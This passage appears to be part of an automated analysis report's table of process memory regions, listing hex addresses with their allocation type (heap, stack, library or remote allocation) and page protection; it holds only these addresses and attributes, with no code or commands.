|
page read and write
|
||
16E6F9DF000
|
heap
|
page read and write
|
||
23A38E1A000
|
heap
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
1311D381000
|
trusted library allocation
|
page read and write
|
||
23A3B32A000
|
trusted library allocation
|
page read and write
|
||
16E6DC85000
|
heap
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
20FEBB53000
|
trusted library allocation
|
page read and write
|
||
29077476000
|
heap
|
page execute and read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
20FEA111000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
7FFD9B955000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1EA3D530000
|
trusted library allocation
|
page read and write
|
||
C7B0FF000
|
stack
|
page read and write
|
||
E5F7EFE000
|
stack
|
page read and write
|
||
24E82069000
|
trusted library allocation
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
120A6B40000
|
heap
|
page execute and read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
2216E731000
|
heap
|
page read and write
|
||
1E0A1FE000
|
stack
|
page read and write
|
||
21CED93B000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
29B1BAC6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
16E6F9A0000
|
heap
|
page read and write
|
||
2216E9A9000
|
heap
|
page read and write
|
||
29B1A380000
|
heap
|
page read and write
|
||
1B991CEE000
|
heap
|
page read and write
|
||
13CEE7E000
|
stack
|
page read and write
|
||
2216C845000
|
heap
|
page read and write
|
||
155C5500000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1208CAE6000
|
heap
|
page read and write
|
||
16E6D950000
|
heap
|
page read and write
|
||
23A3AA8B000
|
trusted library allocation
|
page read and write
|
||
1AFAF927000
|
heap
|
page read and write
|
||
1E09F7E000
|
stack
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
2216E9AA000
|
heap
|
page read and write
|
||
20FEC370000
|
heap
|
page read and write
|
||
C7B479000
|
stack
|
page read and write
|
||
A04EFE000
|
stack
|
page read and write
|
||
21CEF736000
|
heap
|
page read and write
|
||
1E099FF000
|
stack
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
D22B6FE000
|
stack
|
page read and write
|
||
120A6B98000
|
heap
|
page read and write
|
||
1E09FF9000
|
stack
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
5AC000
|
stack
|
page read and write
|
||
1EA57580000
|
heap
|
page read and write
|
||
1208CDC0000
|
heap
|
page read and write
|
||
23A38FC5000
|
heap
|
page read and write
|
||
24E99D30000
|
heap
|
page execute and read and write
|
||
21CEF732000
|
heap
|
page read and write
|
||
1C282980000
|
trusted library allocation
|
page read and write
|
||
13CEC7C000
|
stack
|
page read and write
|
||
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1AFAD6E9000
|
heap
|
page read and write
|
||
2102CFA0000
|
trusted library allocation
|
page read and write
|
||
24EFFB6C000
|
heap
|
page read and write
|
||
E09367E000
|
stack
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
293D2F9000
|
stack
|
page read and write
|
||
2102F526000
|
trusted library allocation
|
page read and write
|
||
21CED939000
|
heap
|
page read and write
|
||
29077553000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
2E2B000
|
stack
|
page read and write
|
||
21CED850000
|
heap
|
page read and write
|
||
29B1A370000
|
trusted library allocation
|
page read and write
|
||
1AFAF90E000
|
heap
|
page read and write
|
||
1EA3EE76000
|
heap
|
page read and write
|
||
29077480000
|
heap
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
1AFAF96A000
|
heap
|
page read and write
|
||
9ED69BF000
|
stack
|
page read and write
|
||
16E6F320000
|
trusted library allocation
|
page read and write
|
||
155ACD78000
|
trusted library allocation
|
page read and write
|
||
2216C84E000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
16E6F9EA000
|
heap
|
page read and write
|
||
D32E1B3000
|
stack
|
page read and write
|
||
1C29A9B6000
|
heap
|
page read and write
|
||
A04BFF000
|
stack
|
page read and write
|
||
2102EA5D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B941000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
2905D651000
|
heap
|
page read and write
|
||
1311D18A000
|
heap
|
page read and write
|
||
7FFD9B969000
|
trusted library allocation
|
page read and write
|
||
1B9943D6000
|
trusted library allocation
|
page read and write
|
||
21CEFAB3000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1208CC95000
|
heap
|
page read and write
|
||
165BDFE000
|
stack
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
29060C76000
|
trusted library allocation
|
page read and write
|
||
30ED000
|
stack
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
2905D440000
|
heap
|
page read and write
|
||
13CF9CD000
|
stack
|
page read and write
|
||
1AFAD76B000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
21047114000
|
heap
|
page read and write
|
||
1EA3EE36000
|
heap
|
page read and write
|
||
1311D3AC000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
595274D000
|
stack
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
1C282C80000
|
trusted library allocation
|
page read and write
|
||
1209E760000
|
trusted library allocation
|
page read and write
|
||
24E81F88000
|
trusted library allocation
|
page read and write
|
||
165BB3E000
|
stack
|
page read and write
|
||
2102CEE0000
|
heap
|
page read and write
|
||
1B9ABFC0000
|
heap
|
page read and write
|
||
13CE5CE000
|
stack
|
page read and write
|
||
D22B27D000
|
stack
|
page read and write
|
||
24E81F84000
|
trusted library allocation
|
page read and write
|
||
1C282831000
|
trusted library allocation
|
page read and write
|
||
1312D380000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
53E12FF000
|
stack
|
page read and write
|
||
C7B83B000
|
stack
|
page read and write
|
||
1208CCD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA83000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
D22B579000
|
stack
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
B51D6FF000
|
unkown
|
page read and write
|
||
84FAFFF000
|
stack
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
D32E77E000
|
stack
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1E09CFF000
|
stack
|
page read and write
|
||
1C29AE50000
|
heap
|
page read and write
|
||
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
29077950000
|
heap
|
page read and write
|
||
16894EFF000
|
trusted library allocation
|
page read and write
|
||
168ABC90000
|
heap
|
page read and write
|
||
16891C64000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
2906F3D1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
1311D463000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
29B1BACA000
|
trusted library allocation
|
page read and write
|
||
D32E67E000
|
stack
|
page read and write
|
||
24E81C2A000
|
trusted library allocation
|
page read and write
|
||
1B991F00000
|
heap
|
page readonly
|
||
155AAFD0000
|
heap
|
page read and write
|
||
24EFFBB7000
|
heap
|
page read and write
|
||
16E00141000
|
trusted library allocation
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
290608B5000
|
trusted library allocation
|
page read and write
|
||
24E819B0000
|
trusted library allocation
|
page read and write
|
||
1E099B3000
|
stack
|
page read and write
|
||
24EFFB30000
|
heap
|
page read and write
|
||
59513DF000
|
stack
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
29B328E0000
|
heap
|
page read and write
|
||
59517FE000
|
stack
|
page read and write
|
||
2905F43C000
|
trusted library allocation
|
page read and write
|
||
1C280918000
|
heap
|
page read and write
|
||
16E00458000
|
trusted library allocation
|
page read and write
|
||
131357C0000
|
heap
|
page read and write
|
||
1C280985000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
2216E636000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA28000
|
trusted library allocation
|
page read and write
|
||
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
24099927000
|
heap
|
page read and write
|
||
24099A80000
|
heap
|
page read and write
|
||
23A52E90000
|
heap
|
page read and write
|
||
24E819A0000
|
heap
|
page readonly
|
||
23A52D1F000
|
heap
|
page read and write
|
||
BB455BE000
|
stack
|
page read and write
|
||
B51D7FE000
|
stack
|
page read and write
|
||
7FFD9B9B1000
|
trusted library allocation
|
page read and write
|
||
5B0F9FB000
|
stack
|
page read and write
|
||
E0936FE000
|
stack
|
page read and write
|
||
E5F7DFF000
|
stack
|
page read and write
|
||
24EFFB74000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
20F901B2000
|
trusted library allocation
|
page read and write
|
||
24E99ED2000
|
heap
|
page read and write
|
||
7FFD9B959000
|
trusted library allocation
|
page read and write
|
||
1C28285C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1EA3F0FD000
|
trusted library allocation
|
page read and write
|
||
21047118000
|
heap
|
page read and write
|
||
7FFD9B9C2000
|
trusted library allocation
|
page read and write
|
||
1DBF806E000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
29B32496000
|
heap
|
page read and write
|
||
155AD2D9000
|
trusted library allocation
|
page read and write
|
||
2216E9A6000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
21CEFAA4000
|
heap
|
page read and write
|
||
240997A0000
|
heap
|
page read and write
|
||
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
16894F5A000
|
trusted library allocation
|
page read and write
|
||
20FEA113000
|
heap
|
page read and write
|
||
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
1311B7E8000
|
heap
|
page read and write
|
||
29060CB1000
|
trusted library allocation
|
page read and write
|
||
9ED6C7F000
|
stack
|
page read and write
|
||
131357C9000
|
heap
|
page read and write
|
||
E093A7E000
|
stack
|
page read and write
|
||
21CED9BD000
|
heap
|
page read and write
|
||
1EA3D205000
|
heap
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
21046E50000
|
heap
|
page read and write
|
||
2102F2BD000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
13CF94E000
|
stack
|
page read and write
|
||
16894AEB000
|
trusted library allocation
|
page read and write
|
||
13CF8CF000
|
stack
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
23A38ED0000
|
heap
|
page readonly
|
||
D32E7F8000
|
stack
|
page read and write
|
||
155ACD2D000
|
trusted library allocation
|
page read and write
|
||
2E6C000
|
stack
|
page read and write
|
||
120A6F40000
|
heap
|
page read and write
|
||
155C5298000
|
heap
|
page read and write
|
||
1C282CFB000
|
trusted library allocation
|
page read and write
|
||
1208CADC000
|
heap
|
page read and write
|
||
F5DDF8000
|
stack
|
page read and write
|
||
23A3B618000
|
trusted library allocation
|
page read and write
|
||
20FEA375000
|
heap
|
page read and write
|
||
23A4A889000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
2102EDC3000
|
trusted library allocation
|
page read and write
|
||
2103E953000
|
trusted library allocation
|
page read and write
|
||
D32E877000
|
stack
|
page read and write
|
||
165CC0F000
|
stack
|
page read and write
|
||
E093BFE000
|
stack
|
page read and write
|
||
5951C7B000
|
stack
|
page read and write
|
||
23A38D63000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
1EA3F0AE000
|
trusted library allocation
|
page read and write
|
||
2216E9A5000
|
heap
|
page read and write
|
||
445994E000
|
unkown
|
page read and write
|
||
23A52D80000
|
heap
|
page read and write
|
||
155ACF87000
|
trusted library allocation
|
page read and write
|
||
23A3B308000
|
trusted library allocation
|
page read and write
|
||
155BCC44000
|
trusted library allocation
|
page read and write
|
||
29B1BFF7000
|
trusted library allocation
|
page read and write
|
||
2102EE20000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
20FEA10C000
|
heap
|
page read and write
|
||
D32E8FE000
|
stack
|
page read and write
|
||
16E6D94C000
|
heap
|
page read and write
|
||
9ED71FC000
|
stack
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
13CED7E000
|
stack
|
page read and write
|
||
16891E5E000
|
heap
|
page read and write
|
||
2216E99E000
|
heap
|
page read and write
|
||
1C282810000
|
heap
|
page read and write
|
||
29B32BEC000
|
heap
|
page read and write
|
||
165BAFE000
|
stack
|
page read and write
|
||
24E81BB2000
|
trusted library allocation
|
page read and write
|
||
155ACC58000
|
trusted library allocation
|
page read and write
|
||
84FB5FE000
|
stack
|
page read and write
|
||
7FFD9B9A8000
|
trusted library allocation
|
page read and write
|
||
2102EA13000
|
trusted library allocation
|
page read and write
|
||
13135806000
|
heap
|
page read and write
|
||
16E6D993000
|
heap
|
page read and write
|
||
293E08E000
|
stack
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
1C282D0F000
|
trusted library allocation
|
page read and write
|
||
1DBF8123000
|
heap
|
page read and write
|
||
21046E26000
|
heap
|
page execute and read and write
|
||
24099A85000
|
heap
|
page read and write
|
||
F5EBCE000
|
stack
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1EA3D120000
|
heap
|
page read and write
|
||
29060C58000
|
trusted library allocation
|
page read and write
|
||
CC000
|
stack
|
page read and write
|
||
1EA3D1DC000
|
heap
|
page read and write
|
||
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
1C282D58000
|
trusted library allocation
|
page read and write
|
||
2216C846000
|
heap
|
page read and write
|
||
168ABBA3000
|
heap
|
page read and write
|
||
2906F3C1000
|
trusted library allocation
|
page read and write
|
||
29B1C0C1000
|
trusted library allocation
|
page read and write
|
||
168ABD90000
|
heap
|
page execute and read and write
|
||
168ABB99000
|
heap
|
page read and write
|
||
21046D4A000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
1EA3EE7A000
|
heap
|
page read and write
|
||
13135950000
|
heap
|
page read and write
|
||
5B0F0FF000
|
stack
|
page read and write
|
||
23A38F45000
|
heap
|
page read and write
|
||
29B1A280000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
1311B905000
|
heap
|
page read and write
|
||
2102E95E000
|
trusted library allocation
|
page read and write
|
||
155AB270000
|
heap
|
page readonly
|
||
7FFD9BA43000
|
trusted library allocation
|
page read and write
|
||
1AFAF5A0000
|
heap
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
1B993D8F000
|
trusted library allocation
|
page read and write
|
||
1208EC50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
C7B2FE000
|
stack
|
page read and write
|
||
21CEFBD7000
|
heap
|
page read and write
|
||
1311D371000
|
trusted library allocation
|
page read and write
|
||
1EA3EECD000
|
heap
|
page read and write
|
||
B51D97E000
|
stack
|
page read and write
|
||
20F8022B000
|
trusted library allocation
|
page read and write
|
||
BB457BE000
|
stack
|
page read and write
|
||
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
168952A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
2102CD60000
|
heap
|
page read and write
|
||
1C282881000
|
trusted library allocation
|
page read and write
|
||
1B993DE2000
|
trusted library allocation
|
page read and write
|
||
2905D5F0000
|
trusted library allocation
|
page read and write
|
||
23A3ABD4000
|
trusted library allocation
|
page read and write
|
||
24E91B31000
|
trusted library allocation
|
page read and write
|
||
2130000
|
heap
|
page read and write
|
||
1B9943C9000
|
trusted library allocation
|
page read and write
|
||
23A38C20000
|
heap
|
page read and write
|
||
C6F000
|
stack
|
page read and write
|
||
24EFFBB3000
|
heap
|
page read and write
|
||
1313583A000
|
heap
|
page read and write
|
||
29B1A845000
|
trusted library allocation
|
page read and write
|
||
24E81B69000
|
trusted library allocation
|
page read and write
|
||
471000
|
remote allocation
|
page execute and read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
21046CE4000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
24EFFC1C000
|
heap
|
page read and write
|
||
C7B3FE000
|
stack
|
page read and write
|
||
1284000
|
heap
|
page read and write
|
||
1B993B3B000
|
trusted library allocation
|
page read and write
|
||
21046F30000
|
heap
|
page execute and read and write
|
||
293D438000
|
stack
|
page read and write
|
||
D22B7FB000
|
stack
|
page read and write
|
||
23A38E15000
|
heap
|
page read and write
|
||
1EA3F0A8000
|
trusted library allocation
|
page read and write
|
||
1C2808DB000
|
heap
|
page read and write
|
||
29B1A83B000
|
trusted library allocation
|
page read and write
|
||
1DBF8091000
|
heap
|
page read and write
|
||
1B991E80000
|
heap
|
page read and write
|
||
7FFD9BA3A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
20FEA1C2000
|
heap
|
page read and write
|
||
1AFAD5F0000
|
heap
|
page read and write
|
||
24E99E81000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
1C280A60000
|
trusted library allocation
|
page read and write
|
||
2905F060000
|
heap
|
page read and write
|
||
7FFD9BA23000
|
trusted library allocation
|
page read and write
|
||
1311B90B000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA21000
|
trusted library allocation
|
page read and write
|
||
23A52F80000
|
heap
|
page read and write
|
||
20F8185E000
|
trusted library allocation
|
page read and write
|
||
155AD131000
|
trusted library allocation
|
page read and write
|
||
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
16894AFB000
|
trusted library allocation
|
page read and write
|
||
155ACF89000
|
trusted library allocation
|
page read and write
|
||
29B1A2F0000
|
heap
|
page readonly
|
||
2216EAD7000
|
heap
|
page read and write
|
||
20FEC4A8000
|
heap
|
page read and write
|
||
29B1BA9F000
|
trusted library allocation
|
page read and write
|
||
293D27F000
|
stack
|
page read and write
|
||
1EA3EFBF000
|
trusted library allocation
|
page read and write
|
||
1AFAF8A0000
|
heap
|
page read and write
|
||
168ABEE3000
|
heap
|
page read and write
|
||
9ED6EFE000
|
stack
|
page read and write
|
||
1311D873000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1C28292F000
|
trusted library allocation
|
page read and write
|
||
168A36A1000
|
trusted library allocation
|
page read and write
|
||
445990E000
|
stack
|
page read and write
|
||
13135883000
|
heap
|
page read and write
|
||
16E00106000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
131357F2000
|
heap
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
2102E880000
|
heap
|
page execute and read and write
|
||
2102CEE5000
|
heap
|
page read and write
|
||
1DBF8060000
|
heap
|
page read and write
|
||
168ABED0000
|
heap
|
page read and write
|
||
165BE7E000
|
stack
|
page read and write
|
||
1311D47B000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
D32E6FE000
|
stack
|
page read and write
|
||
B51DD3E000
|
stack
|
page read and write
|
||
23A3ABE9000
|
trusted library allocation
|
page read and write
|
||
23A3B5B4000
|
trusted library allocation
|
page read and write
|
||
1B993C99000
|
trusted library allocation
|
page read and write
|
||
155C5040000
|
heap
|
page execute and read and write
|
||
29060FF7000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
24EFFF60000
|
heap
|
page read and write
|
||
168ABC48000
|
heap
|
page read and write
|
||
F5E17E000
|
stack
|
page read and write
|
||
24E81FDA000
|
trusted library allocation
|
page read and write
|
||
9ED6E7F000
|
stack
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
20FEA0DF000
|
heap
|
page read and write
|
||
A050FD000
|
stack
|
page read and write
|
||
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
322E000
|
stack
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
1C2807F0000
|
heap
|
page read and write
|
||
53E0EFA000
|
stack
|
page read and write
|
||
16E00011000
|
trusted library allocation
|
page read and write
|
||
2560000
|
heap
|
page read and write
|
||
1B9946C5000
|
trusted library allocation
|
page read and write
|
||
20F81833000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA5F000
|
trusted library allocation
|
page read and write
|
||
24E81C37000
|
trusted library allocation
|
page read and write
|
||
1DBF8020000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
168ABC40000
|
heap
|
page read and write
|
||
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
1EA3EC50000
|
heap
|
page execute and read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
21CEF830000
|
heap
|
page read and write
|
||
29B32BC9000
|
heap
|
page read and write
|
||
53E13FF000
|
stack
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
155ACC4D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
29B18C55000
|
heap
|
page read and write
|
||
29B1A854000
|
trusted library allocation
|
page read and write
|
||
2102CDA6000
|
heap
|
page read and write
|
||
7FFD9BA0A000
|
trusted library allocation
|
page read and write
|
||
1EA3F037000
|
trusted library allocation
|
page read and write
|
||
16E6F340000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
1B991C70000
|
heap
|
page read and write
|
||
1311D460000
|
trusted library allocation
|
page read and write
|
||
155AB14F000
|
heap
|
page read and write
|
||
21CEFAEE000
|
heap
|
page read and write
|
||
155AB0B9000
|
heap
|
page read and write
|
||
1311B7A2000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
9ED69FF000
|
stack
|
page read and write
|
||
13135852000
|
heap
|
page read and write
|
||
16E6F330000
|
heap
|
page readonly
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
1AFAF93C000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
20FEA37E000
|
heap
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
445A17E000
|
stack
|
page read and write
|
||
9ED707E000
|
stack
|
page read and write
|
||
168936A1000
|
trusted library allocation
|
page read and write
|
||
1DBF7FF0000
|
heap
|
page read and write
|
||
16891DF0000
|
trusted library allocation
|
page read and write
|
||
B51D77F000
|
stack
|
page read and write
|
||
1B993990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
165C13F000
|
stack
|
page read and write
|
||
2216E9B3000
|
heap
|
page read and write
|
||
1208CDC5000
|
heap
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
BB44FEF000
|
unkown
|
page read and write
|
||
E09397B000
|
stack
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
16891C25000
|
heap
|
page read and write
|
||
D22B1FF000
|
stack
|
page read and write
|
||
20F818B9000
|
trusted library allocation
|
page read and write
|
||
2216E630000
|
heap
|
page read and write
|
||
2905F074000
|
heap
|
page read and write
|
||
2102CFB5000
|
heap
|
page read and write
|
||
1B991C90000
|
heap
|
page read and write
|
||
155ACC79000
|
trusted library allocation
|
page read and write
|
||
23A52FE8000
|
heap
|
page read and write
|
||
16891D60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
23A3AD5D000
|
trusted library allocation
|
page read and write
|
||
1020000
|
heap
|
page read and write
|
||
2216E69D000
|
heap
|
page read and write
|
||
A04DFE000
|
stack
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
1B991C40000
|
heap
|
page read and write
|
||
16E6D92E000
|
heap
|
page read and write
|
||
155AB345000
|
heap
|
page read and write
|
||
1C29A920000
|
heap
|
page execute and read and write
|
||
21CEF8A1000
|
heap
|
page read and write
|
||
E09464E000
|
stack
|
page read and write
|
||
D22B37F000
|
stack
|
page read and write
|
||
C7B73E000
|
stack
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
23A52E70000
|
heap
|
page read and write
|
||
23A53030000
|
heap
|
page read and write
|
||
21CEF79D000
|
heap
|
page read and write
|
||
3B6E000
|
stack
|
page read and write
|
||
240998F0000
|
heap
|
page read and write
|
||
23A38D5F000
|
heap
|
page read and write
|
||
29B18AA0000
|
heap
|
page read and write
|
||
2216C910000
|
heap
|
page read and write
|
||
E5F83FB000
|
stack
|
page read and write
|
||
16E000FF000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
1311B720000
|
heap
|
page read and write
|
||
21CEFAD1000
|
heap
|
page read and write
|
||
84FB2FE000
|
stack
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
C7B1FE000
|
stack
|
page read and write
|
||
BB45637000
|
stack
|
page read and write
|
||
20FEC360000
|
heap
|
page execute and read and write
|
||
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
B6E000
|
stack
|
page read and write
|
||
4459D7E000
|
stack
|
page read and write
|
||
155AAFF0000
|
heap
|
page read and write
|
||
1B9ABD37000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
D22B2FE000
|
stack
|
page read and write
|
||
2216EAD8000
|
heap
|
page read and write
|
||
1E0A2FE000
|
stack
|
page read and write
|
||
1B991EC0000
|
trusted library allocation
|
page read and write
|
||
293D17E000
|
stack
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
120A6C70000
|
heap
|
page read and write
|
||
20F80C2B000
|
trusted library allocation
|
page read and write
|
||
2216C810000
|
heap
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
1B994640000
|
trusted library allocation
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
155AB300000
|
trusted library allocation
|
page read and write
|
||
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
1AFAF8A1000
|
heap
|
page read and write
|
||
F5DA7F000
|
unkown
|
page read and write
|
||
BB4630E000
|
stack
|
page read and write
|
||
